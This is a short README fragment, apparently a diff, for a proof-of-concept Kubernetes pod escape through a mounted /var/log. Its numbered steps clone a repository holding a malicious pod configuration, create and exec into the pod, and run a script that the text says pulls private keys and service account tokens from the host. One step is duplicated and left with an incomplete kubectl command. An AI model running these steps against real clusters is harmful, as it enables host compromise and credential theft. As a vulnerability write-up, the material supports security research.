haseeb62/CVEs/Mount-var-log/POC/README.md

 3. Clone the repository which contains the configuration file, `escraper.yml`, for malicious Pod. <br/>
 `git clone https://github.com/danielsagi/kube-pod-escape.git`

+3. Prepare the malicious pod using the following command `kubectl create -f `
 4. Exec into the pod.
 The pod contains built-in exploit code which will read any files from the host.<br/>
 `kubectl exec -it mount-var-log -n metarget bash`
 5. Execute the `find_sensitive_files.py` script which downloads private key files and kubernetes service account tokens from the host.<br/>